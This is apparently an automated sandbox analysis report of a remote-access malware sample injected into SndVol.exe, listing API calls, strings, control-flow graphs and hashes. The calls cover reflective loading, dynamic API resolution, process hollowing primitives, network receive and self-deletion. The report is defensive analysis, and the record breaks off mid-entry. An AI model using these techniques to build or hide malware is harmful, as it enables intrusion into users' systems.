97782 29150e97 28 API calls 97709->97782 97713 29132093 28 API calls 97710->97713 97715 2913496e 97712->97715 97717 291349a3 97713->97717 97718 2914b580 80 API calls 97715->97718 97720 29132093 28 API calls 97717->97720 97732 29134973 97718->97732 97719 291349cc 97721 291349f9 CreateEventW CreateEventW 97719->97721 97723 29132093 28 API calls 97719->97723 97722 291349b2 97720->97722 97721->97677 97724 2914b580 80 API calls 97722->97724 97726 291349e2 97723->97726 97728 291349b7 97724->97728 97727 29132093 28 API calls 97726->97727 97729 291349f1 97727->97729 97781 29151143 52 API calls 97728->97781 97731 2914b580 80 API calls 97729->97731 97733 291349f6 97731->97733 97773 29150d31 97732->97773 97733->97721 97735 29134e40 SetEvent CloseHandle 97734->97735 97736 29134e57 closesocket 97734->97736 97737 29134ed8 97735->97737 97738 29134e64 97736->97738 97737->97155 97739 29134e73 97738->97739 97740 29134e7a 97738->97740 97786 291350e4 84 API calls 97739->97786 97742 29134ece SetEvent CloseHandle 97740->97742 97743 29134e8c WaitForSingleObject 97740->97743 97742->97737 97744 29150d31 3 API calls 97743->97744 97745 29134e9b SetEvent WaitForSingleObject 97744->97745 97746 29150d31 3 API calls 97745->97746 97747 29134eb3 SetEvent CloseHandle CloseHandle 97746->97747 97747->97742 97748->97155 97750->97155 97751->97155 97752->97155 97753->97155 97754->97173 97755->97173 97756->97173 97757->97173 97758->97173 97759->97173 97760->97173 97761->97173 97762->97173 97763->97173 97764->97640 97765->97658 97766->97666 97771 2913515c 102 API calls 97768->97771 97770 29135159 97771->97770 97772->97687 97774 2914e7a2 97773->97774 97775 29150d39 97773->97775 97776 2914e7b0 97774->97776 97784 2914d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 97774->97784 97775->97677 97785 2914e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 97776->97785 97779 2914e7b7 97780->97706 97781->97732 97782->97719 97784->97776 97785->97779 97786->97740 97789 29131f8e 97788->97789 97790 29132252 11 API calls 97789->97790 97791 29131f99 97790->97791 97791->97200 97791->97201 97791->97202 97792->97208 97793->97233 97794->97232 97795->97221 97796->97225 97797->97231 97800 2913f7fd 97798->97800 97799 29143584 3 API calls 97799->97800 97800->97799 97802 2913f8a1 97800->97802 97804 2913f891 Sleep 97800->97804 97821 2913f82f 97800->97821 97834 29139097 28 API calls 97802->97834 97804->97800 97805 2913f8ac 97808 2914bcef 28 API calls 97805->97808 97806 2914bcef 28 API calls 97806->97821 97809 2913f8b8 97808->97809 97835 2914384f 14 API calls 97809->97835 97812 2913f8cb 97814 29131f09 11 API calls 97812->97814 97813 29131f09 11 API calls 97813->97821 97815 2913f8d7 97814->97815 97817 29132093 28 API calls 97815->97817 97816 29132093 28 API calls 97816->97821 97818 2913f8e8 97817->97818 97820 291437aa 14 API calls 97818->97820 97819 291437aa 14 API calls 97819->97821 97822 2913f8fb 97820->97822 97821->97804 97821->97806 97821->97813 97821->97816 97821->97819 97831 2913d0d1 112 API calls ___scrt_fastfail 97821->97831 97832 29139097 28 API calls 97821->97832 97833 2914384f 14 API calls 97821->97833 97836 2914288b TerminateProcess WaitForSingleObject 97822->97836 97824 2913f903 ExitProcess 97837 29142829 62 API calls 97827->97837 97832->97821 97833->97821 97834->97805 97835->97812 97836->97824

                                                                        Executed Functions

                                                                        Function 2913F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 29143584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 291435A4
                                                                          • Part of subcall function 29143584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,291A52F0), ref: 291435C2
                                                                          • Part of subcall function 29143584: RegCloseKey.KERNEL32(?), ref: 291435CD
                                                                        • Sleep.KERNEL32(00000BB8), ref: 2913F896
                                                                        • ExitProcess.KERNEL32 ref: 2913F905
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                        • String ID: 5.1.2 Pro$override$pth_unenc
                                                                        • API String ID: 2281282204-3554326054
                                                                        • Opcode ID: 03c21af717002b2485bc6adb80963b03b55d0df3c5be62a998a5488d6fc6e911
                                                                        • Instruction ID: be4c7492a8e3bb1e66040be62659f1e9125b89b0db3b8c00056f3c52bf7182fd
                                                                        • Opcode Fuzzy Hash: 03c21af717002b2485bc6adb80963b03b55d0df3c5be62a998a5488d6fc6e911
                                                                        • Instruction Fuzzy Hash: 21210521F1020077F68C76778C95A6E39BA6FA4518FC0A91CE40557289EE249F0B87AB
                                                                        Function 04421120 Relevance: 4.9, APIs: 3, Instructions: 369memorylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1200 4421120-442114d 1201 4421152-44211b9 1200->1201 1201->1201 1202 44211bf-44211ff call 4421514 1201->1202 1207 4421205-4421228 1202->1207 1208 442150a-4421511 1202->1208 1207->1208 1210 442122e-442124e 1207->1210 1210->1208 1212 4421254-4421274 1210->1212 1212->1208 1214 442127a-44212a8 VirtualAlloc 1212->1214 1215 44212aa-44212b7 VirtualAlloc 1214->1215 1216 44212bd-44212e0 1214->1216 1215->1208 1215->1216 1217 44212e4-44212f3 1216->1217 1218 44212f5-4421308 1217->1218 1219 4421309-442130a 1217->1219 1218->1219 1219->1217 1220 442130c-4421312 1219->1220 1221 4421370-4421384 GetPEB 1220->1221 1222 4421314-4421324 1220->1222 1223 4421386 1221->1223 1224 4421389-442138f 1221->1224 1222->1221 1225 4421326 1222->1225 1223->1224 1226 4421391-4421397 1224->1226 1227 4421328-442132d 1225->1227 1229 44213c0-44213c2 1226->1229 1230 4421399-442139f 1226->1230 1227->1221 1228 442132f-4421334 1227->1228 1231 4421337-442134e 1228->1231 1232 44213c4-44213c6 1229->1232 1233 44213c8-44213d0 1229->1233 1230->1229 1234 44213a1-44213a7 1230->1234 1236 4421350-4421355 1231->1236 1237 4421357-4421358 1231->1237 1232->1226 1238 44213d2-44213d5 1233->1238 1239 442143e-442144b GetPEB 1233->1239 1234->1229 1235 44213a9-44213be 1234->1235 1235->1233 1241 442135d-4421360 1236->1241 1242 4421362-4421363 1237->1242 1243 442135a 1237->1243 1244 44213d7-44213dc 1238->1244 1240 442144e-4421454 1239->1240 1245 44214f6-44214fb 1240->1245 1246 442145a-4421464 1240->1246 1247 4421367-4421369 1241->1247 1242->1247 1249 4421365 1242->1249 1243->1241 1244->1239 1248 44213de-44213ea 1244->1248 1245->1240 1252 4421501-4421507 1245->1252 1246->1245 1256 442146a-4421477 1246->1256 1247->1231 1253 442136b-442136e 1247->1253 1250 44213ef-44213fe LoadLibraryA 1248->1250 1251 44213ec 1248->1251 1249->1247 1250->1208 1255 4421404 1250->1255 1251->1250 1252->1208 1253->1227 1257 4421406-442140d 1255->1257 1256->1245 1258 4421479 1256->1258 1259 4421439-442143c 1257->1259 1260 442140f-4421415 1257->1260 1261 442147b-4421484 1258->1261 1259->1244 1262 4421417-442141d 1260->1262 1263 442141f-4421422 1260->1263 1261->1245 1264 4421486-4421491 1261->1264 1265 4421423-4421437 1262->1265 1263->1265 1266 4421493-4421496 1264->1266 1267 4421498-442149b 1264->1267 1265->1257 1266->1267 1269 442149d-44214c4 1266->1269 1267->1261 1269->1245 1272 44214c6-44214c7 1269->1272 1273 44214c9-44214cc 1272->1273 1274 44214d7-44214f4 1273->1274 1275 44214ce-44214d5 1273->1275 1274->1267 1275->1273
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 044212A3
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 044212B3
                                                                        • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 044213FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 2441068224-0
                                                                        • Opcode ID: fd56b6eb53f1cdb5fdd0890e38ea0e2cb1b853ca5e084496af12267c0617299e
                                                                        • Instruction ID: 76ce5bdf4ea824e759a70c9eb8f4c136e6a7add6ef52d21f754d5bb7e236c4a8
                                                                        • Opcode Fuzzy Hash: fd56b6eb53f1cdb5fdd0890e38ea0e2cb1b853ca5e084496af12267c0617299e
                                                                        • Instruction Fuzzy Hash: 68D17D31A00215AFEF24CF69C985BAEB7B5FF45310F54816AE84AAB745DB30B941CB90
                                                                        Function 291638C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,29163550,00000034,?,?,025ED9A0), ref: 291638DA
                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,291635E3,00000000,?,00000000), ref: 291638F0
                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,291635E3,00000000,?,00000000,2914E2E2), ref: 29163902
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                        • String ID:
                                                                        • API String ID: 1815803762-0
                                                                        • Opcode ID: 9f67f527a0e521e6aa37bbe0b67e254d1adf700b2a5540bd0acf6eadaa655484
                                                                        • Instruction ID: a7c07aa634ecce390b08365d332ccb023634de5fe271dfde2bf324e6449cf7d9
                                                                        • Opcode Fuzzy Hash: 9f67f527a0e521e6aa37bbe0b67e254d1adf700b2a5540bd0acf6eadaa655484
                                                                        • Instruction Fuzzy Hash: 5FE09231B18250BBF7301E17EC09F863AADFB817A4F210639F225E50E8D6524512E654
                                                                        Function 2914B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,2913F25E), ref: 2914B6D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 0d51efe53fbed1dcd511336948ea198dd385d17bed5e411a599517add0938968
                                                                        • Instruction ID: 1f8903f07eebb44bbbf822c1b54f33bdd30bb7a8c92110304e727f3214108c02
                                                                        • Opcode Fuzzy Hash: 0d51efe53fbed1dcd511336948ea198dd385d17bed5e411a599517add0938968
                                                                        • Instruction Fuzzy Hash: 4B014F7190011CABDB00DBD1DC44ADDB7BCAF54305F504156E405A2194EF746B8ECB98
                                                                        Function 29156D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: recv
                                                                        • String ID:
                                                                        • API String ID: 1507349165-0
                                                                        • Opcode ID: 9d31b8620238c20ff5e5c8f9daf7048c5ad05b810b6bf29d98bc15f7d3164c87
                                                                        • Instruction ID: 13bf1add483ba26ff28f7ceadf9eb63b452e183994c934c2ec9b6439896154a5
                                                                        • Opcode Fuzzy Hash: 9d31b8620238c20ff5e5c8f9daf7048c5ad05b810b6bf29d98bc15f7d3164c87
                                                                        • Instruction Fuzzy Hash: 58B09279208242FF9A0A2B61CC08C6ABEB6BBC8381B018C0CB58640130C63A8450AB21
                                                                        Function 2914CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CBF6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CBFF
                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CC16
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC19
                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC2B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC2E
                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC3F
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC42
                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,2913EA1C), ref: 2914CC54
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC57
                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,2913EA1C), ref: 2914CC63
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC66
                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,2913EA1C), ref: 2914CC77
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC7A
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,2913EA1C), ref: 2914CC8B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC8E
                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,2913EA1C), ref: 2914CC9F
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCA2
                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,2913EA1C), ref: 2914CCB3
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCB6
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,2913EA1C), ref: 2914CCC7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCCA
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,2913EA1C), ref: 2914CCDB
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCDE
                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,2913EA1C), ref: 2914CCEF
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCF2
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,2913EA1C), ref: 2914CD03
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD06
                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,2913EA1C), ref: 2914CD14
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD17
                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,2913EA1C), ref: 2914CD28
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD2B
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,2913EA1C), ref: 2914CD38
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD3B
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,2913EA1C), ref: 2914CD48
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD4B
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,2913EA1C), ref: 2914CD5D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD60
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,2913EA1C), ref: 2914CD6D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD70
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,2913EA1C), ref: 2914CD81
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD84
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,2913EA1C), ref: 2914CD95
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD98
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,2913EA1C), ref: 2914CDAA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDAD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,2913EA1C), ref: 2914CDBA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDBD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,2913EA1C), ref: 2914CDCA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDCD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,2913EA1C), ref: 2914CDDA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                        • API String ID: 4236061018-3687161714
                                                                        • Opcode ID: 35156afcd5ed06e92121094e7beed4e76f84e18876e5411821bb6e1fd2c9079c
                                                                        • Instruction ID: a4ffd5de6d4091f0b76166f715f86e8a87ca86dafe5702ffd8c9f08d8172904d
                                                                        • Opcode Fuzzy Hash: 35156afcd5ed06e92121094e7beed4e76f84e18876e5411821bb6e1fd2c9079c
                                                                        • Instruction Fuzzy Hash: C6419CA0D2039CFAEA107BB75DCDD1B3D9DE9952983820816B45DE7548DA3CDE02CFA4
                                                                        Function 2913EA00 Relevance: 49.8, APIs: 15, Strings: 13, Instructions: 795COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 5 2913ea00-2913ea82 call 2914cbe1 GetModuleFileNameW call 2913f3fe call 291320f6 * 2 call 2914beac call 2913fb52 call 29131e8d call 2916fd50 22 2913ea84-2913eac9 call 2913fbee call 29131e65 call 29131fab call 29140f72 call 2913fb9f call 2913f3eb 5->22 23 2913eace-2913eb96 call 29131e65 call 29131fab call 29131e65 call 2913531e call 29136383 call 29131fe2 call 29131fd8 * 2 call 29131e65 call 29131fc0 call 29135aa6 call 29131e65 call 291351e3 call 29131e65 call 291351e3 5->23 49 2913ef2d-2913ef3e call 29131fd8 22->49 69 2913ebe9-2913ec04 call 29131e65 call 2913b9f8 23->69 70 2913eb98-2913ebe3 call 29136c59 call 29131fe2 call 29131fd8 call 29131fab call 29143584 23->70 79 2913ec06-2913ec25 call 29131fab call 29143584 69->79 80 2913ec3e-2913ec45 call 2913d0a4 69->80 70->69 100 2913f38a-2913f3a5 call 29131fab call 291439e4 call 291424b0 70->100 79->80 99 2913ec27-2913ec3d call 29131fab call 291439e4 79->99 88 2913ec47-2913ec49 80->88 89 2913ec4e-2913ec55 80->89 93 2913ef2c 88->93 94 2913ec57 89->94 95 2913ec59-2913ec65 call 2914b354 89->95 93->49 94->95 104 2913ec67-2913ec69 95->104 105 2913ec6e-2913ec72 95->105 99->80 126 2913f3aa-2913f3db call 2914bcef call 29131f04 call 29143a5e call 29131f09 * 2 100->126 104->105 108 2913ecb1-2913ecc4 call 29131e65 call 29131fab 105->108 109 2913ec74 call 29137751 105->109 127 2913ecc6 call 29137790 108->127 128 2913eccb-2913ed53 call 29131e65 call 2914bcef call 29131f13 call 29131f09 call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab 108->128 117 2913ec79-2913ec7b 109->117 120 2913ec87-2913ec9a call 29131e65 call 29131fab 117->120 121 2913ec7d-2913ec82 call 29137773 call 2913729b 117->121 120->108 141 2913ec9c-2913eca2 120->141 121->120 156 2913f3e0-2913f3ea call 2913dd7d call 29144f65 126->156 127->128 177 2913ed55-2913ed6e call 29131e65 call 29131fab call 2916bb56 128->177 178 2913edbb-2913edbf 128->178 141->108 144 2913eca4-2913ecaa 141->144 144->108 147 2913ecac call 2913729b 144->147 147->108 177->178 204 2913ed70-2913edb6 call 29131e65 call 29131fab call 29131e65 call 29131fab call 2913da6f call 29131f13 call 29131f09 177->204 180 2913ef41-2913efa1 call 29166f10 call 2913247c call 29131fab * 2 call 29143733 call 29139092 178->180 181 2913edc5-2913edcc 178->181 234 2913efa6-2913effa call 29131e65 call 29131fab call 29132093 call 29131fab call 291437aa call 29131e65 call 29131fab call 2916bb2c 180->234 183 2913ee4a-2913ee54 call 29139092 181->183 184 2913edce-2913ee48 call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 2913ce34 181->184 190 2913ee59-2913ee7d call 2913247c call 29164829 183->190 184->190 211 2913ee7f-2913ee8a call 29166f10 190->211 212 2913ee8c 190->212 204->178 217 2913ee8e-2913eed9 call 29131f04 call 2916f859 call 2913247c call 29131fab call 2913247c call 29131fab call 29143982 211->217 212->217 272 2913eede-2913ef03 call 29164832 call 29131e65 call 2913b9f8 217->272 286 2913f017-2913f019 234->286 287 2913effc 234->287 272->234 288 2913ef09-2913ef28 call 29131e65 call 2914bcef call 2913f4af 272->288 290 2913f01b-2913f01d 286->290 291 2913f01f 286->291 289 2913effe-2913f015 call 2914ce2c CreateThread 287->289 288->234 306 2913ef2a 288->306 295 2913f025-2913f101 call 29132093 * 2 call 2914b580 call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 2916bb2c call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab call 29131e65 call 29131fab StrToIntA call 29139e1f call 29131e65 call 29131fab 289->295 290->289 291->295 344 2913f103-2913f13a call 2916455e call 29131e65 call 29131fab CreateThread 295->344 345 2913f13c 295->345 306->93 346 2913f13e-2913f156 call 29131e65 call 29131fab 344->346 345->346 357 2913f194-2913f1a7 call 29131e65 call 29131fab 346->357 358 2913f158-2913f18f call 2916455e call 29131e65 call 29131fab CreateThread 346->358 367 2913f207-2913f21a call 29131e65 call 29131fab 357->367 368 2913f1a9-2913f202 call 29131e65 call 29131fab call 29131e65 call 29131fab call 2913da23 call 29131f13 call 29131f09 CreateThread 357->368 358->357 379 2913f255-2913f279 call 2914b69e call 29131f13 call 29131f09 367->379 380 2913f21c-2913f250 call 29131e65 call 29131fab call 29131e65 call 29131fab call 2916bb2c call 2913c19d 367->380 368->367 400 2913f27b-2913f27c SetProcessDEPPolicy 379->400 401 2913f27e-2913f291 CreateThread 379->401 380->379 400->401 405 2913f293-2913f29d CreateThread 401->405 406 2913f29f-2913f2a6 401->406 405->406 410 2913f2b4-2913f2bb 406->410 411 2913f2a8-2913f2b2 CreateThread 406->411 412 2913f2c9 410->412 413 2913f2bd-2913f2c0 410->413 411->410 418 2913f2ce-2913f302 call 29132093 call 291352fd call 29132093 call 2914b580 call 29131fd8 412->418 415 2913f2c2-2913f2c7 413->415 416 2913f307-2913f31a call 29131fab call 2914353a 413->416 415->418 425 2913f31f-2913f322 416->425 418->416 425->156 427 2913f328-2913f368 call 2914bcef call 29131f04 call 29143656 call 29131f09 call 29131f04 425->427 443 2913f381-2913f386 DeleteFileW 427->443 444 2913f36a-2913f36d 443->444 445 2913f388 443->445 444->126 446 2913f36f-2913f37c Sleep call 29131f04 444->446 445->126 446->443
                                                                        APIs
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CBF6
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CBFF
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CC16
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC19
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC2B
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC2E
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC3F
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC42
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,2913EA1C), ref: 2914CC54
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC57
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,2913EA1C), ref: 2914CC63
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC66
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,2913EA1C), ref: 2914CC77
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC7A
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,2913EA1C), ref: 2914CC8B
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC8E
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,2913EA1C), ref: 2914CC9F
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCA2
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,2913EA1C), ref: 2914CCB3
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCB6
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,2913EA1C), ref: 2914CCC7
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCCA
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,2913EA1C), ref: 2914CCDB
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCDE
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,2913EA1C), ref: 2914CCEF
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCF2
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,2913EA1C), ref: 2914CD03
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CD06
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,2913EA1C), ref: 2914CD14
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 2913EA29
                                                                          • Part of subcall function 29140F72: __EH_prolog.LIBCMT ref: 29140F77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
